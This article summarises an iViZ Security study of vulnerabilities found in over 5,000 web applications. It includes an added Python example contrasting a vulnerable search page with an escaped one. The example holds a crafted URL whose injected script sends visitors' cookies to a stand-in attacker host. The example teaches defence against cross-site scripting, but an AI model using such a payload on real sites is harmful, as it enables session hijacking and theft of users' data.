Today, being online is a way of life. Roughly a third of the world's 7 billion people use the Internet, according to ITU World Telecommunication figures for 2011.
It is safe to say that most of us are familiar with the Internet and the World Wide Web. We would not think twice about clicking a link and then using, reading or visiting a Web site; some of us download files from them. But should we be this complacent and trusting? Should we trust the Web sites we visit?
Not if we know just how unsafe the Web really is.
A recent study by iViZ Security, a cloud-based application penetration testing company, suggests that you should not trust websites too much. iViZ should know: the IDG Ventures-funded company has found more than 30 zero-day vulnerabilities, which earned it industry-wide recognition and more than 300 customers.
Using a sample drawn from its customers, iViZ tested more than 5,000 applications. Of these, 25% were from Asia, 40% from the United States and 25% from Europe.
Figure 1: Average Number of Vulnerabilities on Large, Medium and Small Websites
What they found was that almost all (99%) of the applications tested had at least one vulnerability. More than 8 out of 10 had at least one vulnerability rated critical, and the average application carried roughly 35 vulnerabilities. In other words, almost every Web site is exposed to attack.
You might think that no business would want its website hacked, since at the very least that would mean lost customers and a public-relations nightmare, so surely the sites you trust are well secured. You might be wrong on this one too. While every business and Webmaster would say they work hard on securing their sites, the study found a very low correlation between security and compliance: a site that passes a compliance audit is not necessarily a site with few vulnerabilities.
To give you an idea, if you browse retailer sites and buy from them, you could become a victim of an attack. The likely route is cross-site scripting (XSS): a flaw in badly written Web application code that lets an attacker inject script into a page the site serves to you, so the script runs in your browser with access to your session and can steal your data or feed you malicious content.
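The following is an added illustration, not code from the iViZ study or from any site it tested. It shows the reflected XSS pattern described above on a constructed search page: the vulnerable handler copies the query term straight into the HTML, so a crafted link runs attacker script in the victim's browser, while the hardened handler escapes the term for the HTML text context. The URL, the page skeleton and the hostnames are made up for the example.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed sample: a link an attacker would get a victim to open. The "q"
# parameter carries a script that sends the victim's cookies to the attacker.
ATTACK_URL = (
    "https://shop.example/search?q="
    "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.example%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url: str, name: str) -> str:
    """Return the first value of query parameter `name`, percent-decoded."""
    params = parse_qs(urlparse(url).query)
    return params.get(name, [""])[0]


def render_vulnerable(term: str) -> str:
    """Reflect the search term into the page unchanged.

    This is the bug: whatever the attacker put in the URL becomes part of the
    HTML the site serves back, so the browser parses and executes it.
    """
    return "<html><body><h1>Results for " + term + "</h1></body></html>"


def render_hardened(term: str) -> str:
    """Reflect the search term after escaping it for an HTML text context.

    html.escape turns <, >, &, " and ' into entities, so the browser shows the
    attacker's text literally instead of treating it as markup. Note that this
    is only correct for element text; attribute, URL and JavaScript contexts
    need their own encoders.
    """
    safe_term = html.escape(term, quote=True)
    return "<html><body><h1>Results for " + safe_term + "</h1></body></html>"


def contains_script_element(page: str) -> bool:
    """Crude check used to demonstrate the difference between the two renderers."""
    return "<script" in page.lower()


if __name__ == "__main__":
    term = query_param(ATTACK_URL, "q")
    print("vulnerable:", render_vulnerable(term))
    print("hardened:  ", render_hardened(term))
```

Output encoding is the fix for the bug itself; a Content Security Policy that disallows inline script is worthwhile defence in depth, but it does not remove the injection.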
Figure 2: Average Number of Vulnerabilities per Application by Industry Verticals
According to the study, the most exposed industries are retail, education, IT, healthcare, telecommunications, manufacturing and BFSI (banking, financial services and insurance). The first two average 56 and 51 vulnerabilities per application, respectively.
So how are users lulled into a false sense of security? Partly because, according to the study, nine out of ten hacking attacks are never made public.
Are you safe?
Another reason is that the ordinary user may be aware of the threat but assumes it only affects small sites that pay no attention to security.
Figure 3: Average Number of Vulnerabilities on High Security, Average Security and Below Average Security Websites
While it is true that high-security sites have fewer vulnerabilities on average, they still carry an average of 22 vulnerabilities that attackers could exploit. Sites with average and below-average security have an average of 41 and 81 vulnerabilities, respectively.
Larger Web sites also tend to carry more vulnerabilities, averaging around 78. Medium sites average 35 and small sites 26.
Figure 4: Percentage of Websites Containing the “Type of Vulnerability”
What are these vulnerabilities? Apart from cross-site scripting, already mentioned above and found on 65% of the applications tested, the most prevalent vulnerability types (with the share of applications on which each was found) are:
- Information leakage (51%)
- Content spoofing (31%)
- Insufficient authorization (26%)
- Cross-site request forgery (25%)
Figure 5: Average Number of Vulnerabilities per Application by Geography
Of the Web applications tested, those from Asia and the Middle East fared worst, with close to 50 vulnerabilities per application on average. Web applications from Europe and the United States are not much better, averaging 37 and 33 vulnerabilities per application, respectively.